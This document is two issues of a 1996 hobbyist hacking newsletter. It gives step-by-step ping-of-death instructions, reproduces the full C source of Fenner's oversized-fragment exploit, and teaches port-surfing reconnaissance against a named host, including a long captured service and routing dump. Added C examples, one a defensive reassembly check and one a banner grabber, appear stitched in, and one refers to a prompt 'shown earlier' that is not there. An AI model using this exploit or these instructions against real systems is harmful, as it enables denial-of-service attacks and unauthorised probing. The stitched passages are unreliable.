For a hilarious transcript or audio tape of this infamous court session, email hkhenson@cup.portal.com. That's Keith's email address. My hat is off to a superb hacker!
*******************************************
However, the oversize ping packet exploit you are about to learn will do even more damage to some hosts than a gang of flood ping conspirators. And it will do it without tying up the attackers' computer for any longer than the split second it takes to send out just one ping.
The easiest way to do this hack is to run Windows 95. Don't have it? You can generally find an El Cheapo store that will sell it to you for $99.
To do this, first set up your Windows 95 system so that you can make a PPP or SLIP connection with the Internet using the Dialup Networking program under the My Computer icon. You may need some help from your ISP tech support in setting this up. You must do it this way or this hack won't work. Your America Online dialer *definitely* will not work.
************************************
NEWBIE NOTE: If your Internet connection allows you to run a Web browser that shows pictures, you can use that dialup number with your Windows 95 Dialup Networking program to get either a PPP or SLIP connection.
************************************
Next, get yourself connected to the Internet. But don't run a browser or anything. Instead, once your Dialup Networking program tells you that you have a connection, click on the "Start" button and go to the listing "MS-DOS." Open this DOS window. You'll get a prompt:
C:\windows\>
Now let's first do this the good citizen way. At this prompt you can type in a plain ordinary "ping" command:
C:\windows\ping hostname
where "hostname" is the address of some Internet computer. For example, you could ping thales.nmia.com, which is one of my favorite computers, named after an obscure Greek philosopher.
Now if you happened to know the address of one of Saddam Hussein's computers, however, you might want to give the command:
c:\windows\ping -l 65510 saddam_hussein's.computer.mil
Now don't really do this to a real computer! Some, but not all, computers will crash and either remain hung or reboot when they get this ping. Others will continue working cheerily along, and then suddenly go under hours later.
Why? That extra added -l 65510 creates a giant datagram for the ping packet. Some computers, when asked to send back an identical datagram, get really messed up.
If you want all the gory details on this ping exploit, including how to protect your computers from it, check out
http://www.sophist.demon.co.uk/ping.
Now there are other ways to manufacture a giant ping datagram besides using Windows 95. For example, if you run certain FreeBSD or Linux versions of Unix on your PC, you can run this program, which was posted to the Bugtraq list.
From: Bill Fenner
To: Multiple recipients of list BUGTRAQ
Subject: Ping exploit program

Since some people don't necessarily have Windows '95 boxes lying around, I (Fenner) wrote the following exploit program. It requires a raw socket layer that doesn't mess with the packet, so BSD 4.3, SunOS and Solaris are out. It works fine on 4.4BSD systems. It should work on Linux if you compile with -DREALLY_RAW.

Feel free to do with this what you want. Please use this tool only to test your own machines, and not to crash others'.
/*
 * win95ping.c
 *
 * Simulate the evil win95 "ping -l 65510 buggyhost".
 * version 1.0 Bill Fenner 22-Oct-1996
 *
 * This requires raw sockets that don't mess with the packet at all (other
 * than adding the checksum). That means that SunOS, Solaris, and
 * BSD4.3-based systems are out. BSD4.4 systems (FreeBSD, NetBSD,
 * OpenBSD, BSDI) will work. Linux might work, I don't have a Linux
 * system to try it on.
 *
 * The attack from the Win95 box looks like:
 * 17:26:11.013622 cslwin95 > arkroyal: icmp: echo request (frag 6144:1480@0+)
 * 17:26:11.015079 cslwin95 > arkroyal: (frag 6144:1480@1480+)
 * 17:26:11.016637 cslwin95 > arkroyal: (frag 6144:1480@2960+)
 * 17:26:11.017577 cslwin95 > arkroyal: (frag 6144:1480@4440+)
 * 17:26:11.018833 cslwin95 > arkroyal: (frag 6144:1480@5920+)
 * 17:26:11.020112 cslwin95 > arkroyal: (frag 6144:1480@7400+)
 * 17:26:11.021346 cslwin95 > arkroyal: (frag 6144:1480@8880+)
 * 17:26:11.022641 cslwin95 > arkroyal: (frag 6144:1480@10360+)
 * 17:26:11.023869 cslwin95 > arkroyal: (frag 6144:1480@11840+)
 * 17:26:11.025140 cslwin95 > arkroyal: (frag 6144:1480@13320+)
 * 17:26:11.026604 cslwin95 > arkroyal: (frag 6144:1480@14800+)
 * 17:26:11.027628 cslwin95 > arkroyal: (frag 6144:1480@16280+)
 * 17:26:11.028871 cslwin95 > arkroyal: (frag 6144:1480@17760+)
 * 17:26:11.030100 cslwin95 > arkroyal: (frag 6144:1480@19240+)
 * 17:26:11.031307 cslwin95 > arkroyal: (frag 6144:1480@20720+)
 * 17:26:11.032542 cslwin95 > arkroyal: (frag 6144:1480@22200+)
 * 17:26:11.033774 cslwin95 > arkroyal: (frag 6144:1480@23680+)
 * 17:26:11.035018 cslwin95 > arkroyal: (frag 6144:1480@25160+)
 * 17:26:11.036576 cslwin95 > arkroyal: (frag 6144:1480@26640+)
 * 17:26:11.037464 cslwin95 > arkroyal: (frag 6144:1480@28120+)
 * 17:26:11.038696 cslwin95 > arkroyal: (frag 6144:1480@29600+)
 * 17:26:11.039966 cslwin95 > arkroyal: (frag 6144:1480@31080+)
 * 17:26:11.041218 cslwin95 > arkroyal: (frag 6144:1480@32560+)
 * 17:26:11.042579 cslwin95 > arkroyal: (frag 6144:1480@34040+)
 * 17:26:11.043807 cslwin95 > arkroyal: (frag 6144:1480@35520+)
 * 17:26:11.046276 cslwin95 > arkroyal: (frag 6144:1480@37000+)
 * 17:26:11.047236 cslwin95 > arkroyal: (frag 6144:1480@38480+)
 * 17:26:11.048478 cslwin95 > arkroyal: (frag 6144:1480@39960+)
 * 17:26:11.049698 cslwin95 > arkroyal: (frag 6144:1480@41440+)
 * 17:26:11.050929 cslwin95 > arkroyal: (frag 6144:1480@42920+)
 * 17:26:11.052164 cslwin95 > arkroyal: (frag 6144:1480@44400+)
 * 17:26:11.053398 cslwin95 > arkroyal: (frag 6144:1480@45880+)
 * 17:26:11.054685 cslwin95 > arkroyal: (frag 6144:1480@47360+)
 * 17:26:11.056347 cslwin95 > arkroyal: (frag 6144:1480@48840+)
 * 17:26:11.057313 cslwin95 > arkroyal: (frag 6144:1480@50320+)
 * 17:26:11.058357 cslwin95 > arkroyal: (frag 6144:1480@51800+)
 * 17:26:11.059588 cslwin95 > arkroyal: (frag 6144:1480@53280+)
 * 17:26:11.060787 cslwin95 > arkroyal: (frag 6144:1480@54760+)
 * 17:26:11.062023 cslwin95 > arkroyal: (frag 6144:1480@56240+)
 * 17:26:11.063247 cslwin95 > arkroyal: (frag 6144:1480@57720+)
 * 17:26:11.064479 cslwin95 > arkroyal: (frag 6144:1480@59200+)
 * 17:26:11.066252 cslwin95 > arkroyal: (frag 6144:1480@60680+)
 * 17:26:11.066957 cslwin95 > arkroyal: (frag 6144:1480@62160+)
 * 17:26:11.068220 cslwin95 > arkroyal: (frag 6144:1480@63640+)
 * 17:26:11.069107 cslwin95 > arkroyal: (frag 6144:398@65120)
 *
 */

#include <stdio.h>
#include <stdlib.h>            /* exit() */
#include <strings.h>           /* bzero(), bcopy() */
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>             /* gethostbyname() */
#include <netinet/in.h>
#include <netinet/in_systm.h>  /* types that netinet/ip.h needs on BSD */
#include <netinet/ip.h>        /* struct ip, IP_MF */
#include <netinet/ip_icmp.h>   /* struct icmp, ICMP_ECHO */
#include <arpa/inet.h>         /* inet_addr(), inet_ntoa() */

/*
 * If your kernel doesn't muck with raw packets, #define REALLY_RAW.
 * This is probably only Linux.
 */
#ifdef REALLY_RAW
#define FIX(x) htons(x)
#else
#define FIX(x) (x)
#endif

int
main(int argc, char **argv)
{
    int s;
    char buf[1500];                                  /* one 1480-byte fragment plus IP header */
    struct ip *ip = (struct ip *)buf;
    struct icmp *icmp = (struct icmp *)(ip + 1);     /* ICMP header sits right after the IP header */
    struct hostent *hp;
    struct sockaddr_in dst;
    int offset;
    int on = 1;

    bzero(buf, sizeof buf);
    bzero(&dst, sizeof dst);                         /* don't hand sendto() an uninitialised sockaddr */
    if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) < 0) {
        perror("socket");
        exit(1);
    }
    if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
        perror("IP_HDRINCL");
        exit(1);
    }
    if (argc != 2) {
        fprintf(stderr, "usage: %s hostname\n", argv[0]);
        exit(1);
    }
    if ((hp = gethostbyname(argv[1])) == NULL) {
        if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == INADDR_NONE) {
            fprintf(stderr, "%s: unknown host\n", argv[1]);
            exit(1);                                 /* nothing sensible to send to */
        }
    } else {
        bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
    }
    printf("Sending to %s\n", inet_ntoa(ip->ip_dst));
    ip->ip_v = 4;
    ip->ip_hl = sizeof *ip >> 2;                     /* header length in 32-bit words */
    ip->ip_tos = 0;
    ip->ip_len = FIX(sizeof buf);
    ip->ip_id = htons(4321);                         /* same id on every fragment */
    ip->ip_off = FIX(0);
    ip->ip_ttl = 255;
    ip->ip_p = 1;                                    /* IPPROTO_ICMP */
    ip->ip_sum = 0;                                  /* kernel fills in */
    ip->ip_src.s_addr = 0;                           /* kernel fills in */

    dst.sin_addr = ip->ip_dst;
    dst.sin_family = AF_INET;

    icmp->icmp_type = ICMP_ECHO;
    icmp->icmp_code = 0;
    icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));
    /* the checksum of all 0's is easy to compute */
    for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) {
        ip->ip_off = FIX(offset >> 3);               /* fragment offset is in 8-byte units */
        if (offset < 65120)
            ip->ip_off |= FIX(IP_MF);                /* more fragments follow */
        else
            ip->ip_len = FIX(418);                   /* make total 65538 */
        if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
                   sizeof dst) < 0) {
            fprintf(stderr, "offset %d: ", offset);
            perror("sendto");
        }
        if (offset == 0) {
            /* only the first fragment carries the ICMP header */
            icmp->icmp_type = 0;
            icmp->icmp_code = 0;
            icmp->icmp_cksum = 0;
        }
    }
    return 0;
}
(End of Fenner's ping exploit message.)
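The numbers in the trace at the top of Fenner's program show exactly why -l 65510 breaks things: the last fragment starts at byte 65120 and carries 398 bytes, so reassembly ends at byte 65518 of payload, or 65538 once the 20-byte IP header is counted, three bytes more than the 16-bit length field in an IP header can describe and more than the buffer an unwary TCP/IP stack sets aside. Here is the check a receiving stack needs, as an added example in C that is not from the Guide or from Fenner (the fragment struct and the function names are made up for the example). It replays the offsets and lengths from the trace and rejects that train, and accepts an ordinary 1500-byte ping.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Limits fixed by the IPv4 header: the total-length field is 16 bits, so a
 * reassembled datagram (header + payload) can never legitimately exceed 65535. */
#define IP_HDR_LEN      20u
#define IP_MAX_DATAGRAM 65535u
#define MAX_PAYLOAD     (IP_MAX_DATAGRAM - IP_HDR_LEN)   /* 65515 bytes */

/* A fragment as the receiver parses it out of the IP header. */
struct fragment {
    unsigned offset;   /* byte offset: the 13-bit fragment-offset field times 8 */
    unsigned len;      /* payload bytes in this fragment (ip_len minus header) */
    int more;          /* the IP_MF "more fragments" bit */
};

/* Hypothetical reassembly check: returns the reassembled payload length when
 * every fragment fits inside a 65515-byte buffer, or -1 as soon as one would
 * write past its end (the ping-of-death condition). The check runs before any
 * byte is copied, so the oversized fragment never touches the buffer. */
long check_fragments(const struct fragment *f, size_t n)
{
    uint64_t total = 0;
    for (size_t i = 0; i < n; i++) {
        uint64_t end = (uint64_t)f[i].offset + f[i].len;  /* 64-bit: cannot wrap */
        if (end > MAX_PAYLOAD)
            return -1;            /* drop this and everything queued under its IP id */
        if (!f[i].more && end > total)
            total = end;          /* the fragment without IP_MF ends the datagram */
    }
    return (long)total;
}

/* Constructed fragment train copied from the Win95 tcpdump trace above:
 * 44 fragments of 1480 bytes with IP_MF set, then 398 bytes at offset 65120. */
size_t win95_trace(struct fragment *out, size_t cap)
{
    size_t n = 0;
    for (unsigned off = 0; off < 65120 && n < cap; off += 1480)
        out[n++] = (struct fragment){ off, 1480, 1 };
    if (n < cap)
        out[n++] = (struct fragment){ 65120, 398, 0 };
    return n;
}

/* A normal 1500-byte ping: one unfragmented packet, 1480 bytes of payload. */
size_t normal_ping(struct fragment *out, size_t cap)
{
    if (cap == 0) return 0;
    out[0] = (struct fragment){ 0, 1480, 0 };
    return 1;
}

size_t win95_fragment_count(void)
{
    struct fragment f[64];
    return win95_trace(f, 64);
}

long win95_verdict(void)
{
    struct fragment f[64];
    size_t n = win95_trace(f, 64);
    return check_fragments(f, n);
}

long normal_verdict(void)
{
    struct fragment f[64];
    size_t n = normal_ping(f, 64);
    return check_fragments(f, n);
}

int main(void)
{
    printf("win95 trace: %zu fragments -> %ld\n", win95_fragment_count(), win95_verdict());
    printf("normal ping: 1 fragment -> %ld\n", normal_verdict());
    return 0;
}
```

Thwarting the attack, which the Guide calls the elite part, comes down to that one comparison: a fragment whose offset plus length exceeds the largest payload an IP datagram can carry is discarded, together with the rest of its reassembly queue, instead of being copied into a fixed-size buffer. The same comparison also catches the hours-later failures the Guide mentions, because the damaged memory is never written in the first place.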
********************************************
YOU CAN GO TO JAIL NOTE: Not only is this hack not elite, if you are reading this you don't know enough to keep from getting busted from doing this ping hack. On the other hand, if you were to do it to an Internet host in Iraq...
********************************************
Of course there are many other kewl things you can do with ping. If you have a shell account, you can find out lots of stuph about ping by giving the command:
man ping
In fact, you can get lots of details on any Unix command with "man."
Have fun with ping -- and be good! But remember, I'm not begging the evil genius wannabes to be good. See if I care when you get busted...
_________________________________________________________
To subscribe, email hacker@techbroker.com with message "subscribe hh." To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com. Please direct flames to dev/null@techbroker.com. Happy hacking!
Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end.
________________________________________________________
____________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 2 Number 4
More intro to TCP/IP: port surfing! Daemons! How to get on almost any computer without logging in and without breaking the law. Impress your clueless friends and actually discover kewl, legal, safe stuph.
____________________________________________________________
A few days ago I had a lady friend visiting. She’s 42 and doesn’t own a computer. However, she is taking a class on personal computers at a community college. She wanted to know what all this hacking stuph is about. So I decided to introduce her to port surfing. And while doing it, we stumbled across something kewl.
Port surfing takes advantage of the structure of TCP/IP. This is the protocol (set of rules) used for computers to talk to each other over the Internet. One of the basic principles of Unix (the most popular operating system on the Internet) is to assign a “port” to every function that one computer might command another to perform. Common examples are to send and receive email, read Usenet newsgroups, telnet, transfer files, and offer Web pages.
************************
Newbie note #1: A computer port is a place where information goes in or out of it. On your home computer, examples of ports are your monitor, which sends information out, your keyboard and mouse, which send information in, and your modem, which sends information both out and in.
But an Internet host computer such as callisto.unm.edu has many more ports than a typical home computer. These ports are identified by numbers. Now these are not all physical ports, like a keyboard or RS232 serial port (for your modem). They are virtual (software) ports.
A “service” is a program running on a “port.” When you telnet to a port, that program is up and running, just waiting for your input. Happy hacking!
************************
So if you want to read a Web page, your browser contacts port number 80 and tells the computer that manages that Web site to let you in. And, sure enough, you get into that Web server computer without a password.
OK, big deal. That's pretty standard for the Internet. Many -- most -- computers on the Internet will let you do some things with them without needing a password.
However, the essence of hacking is doing things that aren’t obvious. That don’t just jump out at you from the manuals. One way you can move a step up from the run of the mill computer user is to learn how to port surf.
The essence of port surfing is to pick out a target computer and explore it to see what ports are open and what you can do with them.
Now if you are a lazy hacker you can use canned hacker tools such as Satan or Netcat. These are programs you can run from Linux, FreeBSD or Solaris (all types of Unix) from your PC. They automatically scan your target computers. They will tell you what ports are in use. They will also probe these ports for presence of daemons with known security flaws, and tell you what they are.
********************************
Newbie note # 2: A daemon is not some sort of grinch or gremlin or 666 guy. It is a program that runs in the background on many (but not all) Unix system ports. It waits for you to come along and use it. If you find a daemon on a port, it’s probably hackable. Some hacker tools will tell you what the hackable features are of the daemons they detect.
********************************
However, there are several reasons to surf ports by hand instead of automatically.
1) You will learn something. Probing manually you get a gut feel for how the daemon running on that port behaves. It’s the difference between watching an x-rated movie and (blush).
2) You can impress your friends. If you run a canned hacker tool like Satan your friends will look at you and say, “Big deal. I can run programs, too.” They will immediately catch on to the dirty little secret of the hacker world. Most hacking exploits are just lamerz running programs they picked up from some BBS or ftp site. But if you enter commands keystroke by keystroke they will see you using your brain. And you can help them play with daemons, too, and give them a giant rush.
3) The truly elite hackers surf ports and play with daemons by hand because it is the only way to discover something new. There are only a few hundred hackers -- at most -- who discover new stuph. The rest just run canned exploits over and over and over again. Boring. But I am teaching you how to reach the pinnacle of hackerdom.
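Here is what the "telnet hostname port" command used throughout this issue is doing underneath, as an added example in C that is not from the Guide: open a TCP connection to a port and read whatever the daemon there announces before you have typed anything. So that it runs offline, the program forks a throwaway loopback daemon (constructed for the example, sending a banner modelled on the SunOS login prompt shown earlier) and surfs its port; a real daemon is read the same way by giving its address and port to grab_banner. It also confirms that once the daemon has gone the same port refuses the connection, which is what telnet reports as "Connection refused" on a port nobody is listening on.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>

/* Connect to ip:port and read until the daemon closes the connection or the
 * buffer fills. Returns the number of banner bytes, or -1 if nothing accepted
 * the connection. */
int grab_banner(const char *ip, int port, char *out, size_t cap)
{
    int s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) return -1;
    struct sockaddr_in a;
    memset(&a, 0, sizeof a);
    a.sin_family = AF_INET;
    a.sin_port = htons((uint16_t)port);
    if (inet_pton(AF_INET, ip, &a.sin_addr) != 1 ||
        connect(s, (struct sockaddr *)&a, sizeof a) < 0) {
        close(s);
        return -1;
    }
    size_t got = 0;
    while (got < cap - 1) {
        ssize_t n = read(s, out + got, cap - 1 - got);
        if (n <= 0) break;                /* EOF: the daemon hung up */
        got += (size_t)n;
    }
    close(s);
    out[got] = '\0';
    return (int)got;
}

/* Constructed stand-in daemon: the parent binds an ephemeral loopback port,
 * a forked child accepts one client, writes the banner and exits, and the
 * parent port-surfs it. Returns 1 when the banner comes back intact and the
 * port refuses connections once the daemon is gone. */
int demo(void)
{
    static const char banner[] = "SunOS UNIX (slug)\r\n\r\nlogin: ";  /* constructed */
    int ls = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in a;
    socklen_t alen = sizeof a;
    memset(&a, 0, sizeof a);
    a.sin_family = AF_INET;
    a.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    a.sin_port = 0;                                  /* kernel picks a free port */
    if (ls < 0 || bind(ls, (struct sockaddr *)&a, sizeof a) < 0 || listen(ls, 1) < 0 ||
        getsockname(ls, (struct sockaddr *)&a, &alen) < 0)
        return 0;
    int port = ntohs(a.sin_port);

    pid_t pid = fork();
    if (pid < 0) return 0;
    if (pid == 0) {                                  /* child: the "daemon" */
        int c = accept(ls, NULL, NULL);
        if (c >= 0) {
            ssize_t w = write(c, banner, sizeof banner - 1);
            (void)w;
            close(c);
        }
        _exit(0);
    }
    close(ls);                                       /* parent keeps only the client side */

    char buf[256];
    int n = grab_banner("127.0.0.1", port, buf, sizeof buf);
    int status;
    waitpid(pid, &status, 0);                        /* daemon has exited: port is closed */
    int intact = n == (int)(sizeof banner - 1) && strcmp(buf, banner) == 0;
    int refused = grab_banner("127.0.0.1", port, buf, sizeof buf) == -1;
    return intact && refused;
}

int main(void)
{
    printf("loopback port surf: %s\n", demo() ? "banner matched, port closed afterwards" : "failed");
    return 0;
}
```

Notice that everything grab_banner learns is volunteered by the daemon before any login: operating system, product and version strings in the MultiNet example that follows. From the administrator's side, that is the argument for turning off services nobody needs and trimming what the remaining ones announce.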
Now let me tell you what my middle aged friend and I discovered just messing around. First, we decided we didn’t want to waste our time messing with some minor little host computer. Hey, let’s go for the big time!
So how do you find a big kahuna computer on the Internet? We started with a domain which consisted of a LAN of PCs running Linux that I happened to already know about, that is used by the New Mexico Internet Access ISP: nmia.com.
*****************************
Newbie Note # 3: A domain is an Internet address. You can use it to look up who runs the computers used by the domain, and also to look up how that domain is connected to the rest of the Internet.
*****************************
So to do this we first logged into my shell account with Southwest Cyberport. I gave the command:
[66] ->whois nmia.com
New Mexico Internet Access (NMIA-DOM)
2201 Buena Vista SE
Albuquerque, NM 87106
Domain Name: NMIA.COM
Administrative Contact, Technical Contact, Zone Contact:
Orrell, Stan (SO11) SAO@NMIA.COM
(505) 877-0617
Record last updated on 11-Mar-94.
Record created on 11-Mar-94.
Domain servers in listed order:
NS.NMIA.COM 198.59.166.10
GRANDE.NM.ORG 129.121.1.2
Now it’s a good bet that grande.nm.org is serving a lot of other Internet hosts beside nmia.com. Here’s how we port surf our way to find this out:
[67] ->telnet grande.nm.org 15
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.
TGV MultiNet V3.5 Rev B, VAX 4000-400, OpenVMS VAX V6.1
Product License Authorization Expiration Date
---------- ------- ------------- ---------------
MULTINET Yes A-137-1641 (none)
NFS-CLIENT Yes A-137-113237 (none)
*** Configuration for file "MULTINET:NETWORK_DEVICES.CONFIGURATION" ***
Device Adapter CSR Address Flags/Vector
------ ------- ----------- ------------
se0 (Shared VMS Ethernet/FDDI) -NONE- -NONE- -NONE-
MultiNet Active Connections, including servers:
Proto Rcv-Q Snd-Q Local Address (Port) Foreign Address (Port) State
----- ----- ----- ------------------ ------------------ -----
TCP 0 822 GRANDE.NM.ORG(NETSTAT) 198.59.115.24(1569) ESTABLISHED
TCP 0 0 GRANDE.NM.ORG(POP3) 164.64.201.67(1256) ESTABLISHED
TCP 0 0 GRANDE.NM.ORG(4918) 129.121.254.5(TELNET) ESTABLISHED
TCP 0 0 GRANDE.NM.ORG(TELNET) AVATAR.NM.ORG(3141) ESTABLISHED
TCP 0 0 *(NAMESERVICE) *(*) LISTEN
TCP 0 0 *(TELNET) *(*) LISTEN
TCP 0 0 *(FTP) *(*) LISTEN
TCP 0 0 *(FINGER) *(*) LISTEN
TCP 0 0 *(NETSTAT) *(*) LISTEN
TCP 0 0 *(SMTP) *(*) LISTEN
TCP 0 0 *(LOGIN) *(*) LISTEN
TCP 0 0 *(SHELL) *(*) LISTEN
TCP 0 0 *(EXEC) *(*) LISTEN
TCP 0 0 *(RPC) *(*) LISTEN
TCP 0 0 *(NETCONTROL) *(*) LISTEN
TCP 0 0 *(SYSTAT) *(*) LISTEN
TCP 0 0 *(CHARGEN) *(*) LISTEN
TCP 0 0 *(DAYTIME) *(*) LISTEN
TCP 0 0 *(TIME) *(*) LISTEN
TCP 0 0 *(ECHO) *(*) LISTEN
TCP 0 0 *(DISCARD) *(*) LISTEN
TCP 0 0 *(PRINTER) *(*) LISTEN
TCP 0 0 *(POP2) *(*) LISTEN
TCP 0 0 *(POP3) *(*) LISTEN
TCP 0 0 *(KERBEROS_MASTER) *(*) LISTEN
TCP 0 0 *(KLOGIN) *(*) LISTEN
TCP 0 0 *(KSHELL) *(*) LISTEN
TCP 0 0 GRANDE.NM.ORG(4174) OSO.NM.ORG(X11) ESTABLISHED
TCP 0 0 GRANDE.NM.ORG(4172) OSO.NM.ORG(X11) ESTABLISHED
TCP 0 0 GRANDE.NM.ORG(4171) OSO.NM.ORG(X11) ESTABLISHED
TCP 0 0 *(FS) *(*) LISTEN
UDP 0 0 *(NAMESERVICE) *(*)
UDP 0 0 127.0.0.1(NAMESERVICE) *(*)
UDP 0 0 GRANDE.NM.OR(NAMESERV) *(*)
UDP 0 0 *(TFTP) *(*)
UDP 0 0 *(BOOTPS) *(*)
UDP 0 0 *(KERBEROS) *(*)
UDP 0 0 127.0.0.1(KERBEROS) *(*)
UDP 0 0 GRANDE.NM.OR(KERBEROS) *(*)
UDP 0 0 *(*) *(*)
UDP 0 0 *(SNMP) *(*)
UDP 0 0 *(RPC) *(*)
UDP 0 0 *(DAYTIME) *(*)
UDP 0 0 *(ECHO) *(*)
UDP 0 0 *(DISCARD) *(*)
UDP 0 0 *(TIME) *(*)
UDP 0 0 *(CHARGEN) *(*)
UDP 0 0 *(TALK) *(*)
UDP 0 0 *(NTALK) *(*)
UDP 0 0 *(1023) *(*)
UDP 0 0 *(XDMCP) *(*)
MultiNet registered RPC programs:
Program Version Protocol Port
------- ------- -------- ----
PORTMAP 2 TCP 111
PORTMAP 2 UDP 111
MultiNet IP Routing tables:
Destination Gateway Flags Refcnt Use Interface MTU
---------- ---------- ----- ------ ----- --------- ----
198.59.167.1 LAWRII.NM.ORG Up,Gateway,H 0 2 se0 1500
166.45.0.1 ENSS365.NM.ORG Up,Gateway,H 0 4162 se0 1500
205.138.138.1 ENSS365.NM.ORG Up,Gateway,H 0 71 se0 1500
204.127.160.1 ENSS365.NM.ORG Up,Gateway,H 0 298 se0 1500
127.0.0.1 127.0.0.1 Up,Host 5 1183513 lo0 4136
198.59.167.2 LAWRII.NM.ORG Up,Gateway,H 0 640 se0 1500
192.132.89.2 ENSS365.NM.ORG Up,Gateway,H 0 729 se0 1500
207.77.56.2 ENSS365.NM.ORG Up,Gateway,H 0 5 se0 1500
204.97.213.2 ENSS365.NM.ORG Up,Gateway,H 0 2641 se0 1500
194.90.74.66 ENSS365.NM.ORG Up,Gateway,H 0 1 se0 1500
204.252.102.2 ENSS365.NM.ORG Up,Gateway,H 0 109 se0 1500
205.160.243.2 ENSS365.NM.ORG Up,Gateway,H 0 78 se0 1500
202.213.4.2 ENSS365.NM.ORG Up,Gateway,H 0 4 se0 1500
202.216.224.66 ENSS365.NM.ORG Up,Gateway,H 0 113 se0 1500
192.132.89.3 ENSS365.NM.ORG Up,Gateway,H 0 1100 se0 1500
198.203.196.67 ENSS365.NM.ORG Up,Gateway,H 0 385 se0 1500
160.205.13.3 ENSS365.NM.ORG Up,Gateway,H 0 78 se0 1500
202.247.107.131 ENSS365.NM.ORG Up,Gateway,H 0 19 se0 1500
198.59.167.4 LAWRII.NM.ORG Up,Gateway,H 0 82 se0 1500
128.148.157.6 ENSS365.NM.ORG Up,Gateway,H 0 198 se0 1500
160.45.10.6 ENSS365.NM.ORG Up,Gateway,H 0 3 se0 1500
128.121.50.7 ENSS365.NM.ORG Up,Gateway,H 0 3052 se0 1500
206.170.113.8 ENSS365.NM.ORG Up,Gateway,H 0 1451 se0 1500
128.148.128.9 ENSS365.NM.ORG Up,Gateway,H 0 1122 se0 1500
203.7.132.9 ENSS365.NM.ORG Up,Gateway,H 0 14 se0 1500
204.216.57.10 ENSS365.NM.ORG Up,Gateway,H 0 180 se0 1500
130.74.1.75 ENSS365.NM.ORG Up,Gateway,H 0 10117 se0 1500
206.68.65.15 ENSS365.NM.ORG Up,Gateway,H 0 249 se0 1500
129.219.13.81 ENSS365.NM.ORG Up,Gateway,H 0 547 se0 1500
204.255.246.18 ENSS365.NM.ORG Up,Gateway,H 0 1125 se0 1500
160.45.24.21 ENSS365.NM.ORG Up,Gateway,H 0 97 se0 1500
206.28.168.21 ENSS365.NM.ORG Up,Gateway,H 0 2093 se0 1500
163.179.3.222 ENSS365.NM.ORG Up,Gateway,H 0 315 se0 1500
198.109.130.33 ENSS365.NM.ORG Up,Gateway,H 0 1825 se0 1500
199.224.108.33 ENSS365.NM.ORG Up,Gateway,H 0 11362 se0 1500
203.7.132.98 ENSS365.NM.ORG Up,Gateway,H 0 73 se0 1500
198.111.253.35 ENSS365.NM.ORG Up,Gateway,H 0 1134 se0 1500
206.149.24.100 ENSS365.NM.ORG Up,Gateway,H 0 3397 se0 1500
165.212.105.106 ENSS365.NM.ORG Up,Gateway,H 0 17 se0 1006
205.238.3.241 ENSS365.NM.ORG Up,Gateway,H 0 69 se0 1500
198.49.44.242 ENSS365.NM.ORG Up,Gateway,H 0 25 se0 1500
194.22.188.242 ENSS365.NM.ORG Up,Gateway,H 0 20 se0 1500
164.64.0 LAWRII.NM.ORG Up,Gateway 1 40377 se0 1500
0.0.0 ENSS365.NM.ORG Up,Gateway 2 4728741 se0 1500
207.66.1 GLORY.NM.ORG Up,Gateway 0 51 se0 1500
205.166.1 GLORY.NM.ORG Up,Gateway 0 1978 se0 1500
204.134.1 LAWRII.NM.ORG Up,Gateway 0 54 se0 1500
204.134.2 GLORY.NM.ORG Up,Gateway 0 138 se0 1500
192.132.2 129.121.248.1 Up,Gateway 0 6345 se0 1500
204.134.67 GLORY.NM.ORG Up,Gateway 0 2022 se0 1500
206.206.67 GLORY.NM.ORG Up,Gateway 0 7778 se0 1500
206.206.68 LAWRII.NM.ORG Up,Gateway 0 3185 se0 1500
207.66.5 GLORY.NM.ORG Up,Gateway 0 626 se0 1500
204.134.69 GLORY.NM.ORG Up,Gateway 0 7990 se0 1500
207.66.6 GLORY.NM.ORG Up,Gateway 0 53 se0 1500
204.134.70 LAWRII.NM.ORG Up,Gateway 0 18011 se0 1500
192.188.135 GLORY.NM.ORG Up,Gateway 0 5 se0 1500
206.206.71 LAWRII.NM.ORG Up,Gateway 0 2 se0 1500
204.134.7 GLORY.NM.ORG Up,Gateway 0 38 se0 1500
199.89.135 GLORY.NM.ORG Up,Gateway 0 99 se0 1500
198.59.136 LAWRII.NM.ORG Up,Gateway 0 1293 se0 1500
204.134.9 GLORY.NM.ORG Up,Gateway 0 21 se0 1500
204.134.73 GLORY.NM.ORG Up,Gateway 0 59794 se0 1500
129.138.0 GLORY.NM.ORG Up,Gateway 0 5262 se0 1500
192.92.10 LAWRII.NM.ORG Up,Gateway 0 163 se0 1500
206.206.75 LAWRII.NM.ORG Up,Gateway 0 604 se0 1500
207.66.13 GLORY.NM.ORG Up,Gateway 0 1184 se0 1500
204.134.77 LAWRII.NM.ORG Up,Gateway 0 3649 se0 1500
207.66.14 GLORY.NM.ORG Up,Gateway 0 334 se0 1500
204.134.78 GLORY.NM.ORG Up,Gateway 0 239 se0 1500
204.52.207 GLORY.NM.ORG Up,Gateway 0 293 se0 1500
204.134.79 GLORY.NM.ORG Up,Gateway 0 1294 se0 1500
192.160.144 LAWRII.NM.ORG Up,Gateway 0 117 se0 1500
206.206.80 PENNY.NM.ORG Up,Gateway 0 4663 se0 1500
204.134.80 GLORY.NM.ORG Up,Gateway 0 91 se0 1500
198.99.209 LAWRII.NM.ORG Up,Gateway 0 1136 se0 1500
207.66.17 GLORY.NM.ORG Up,Gateway 0 24173 se0 1500
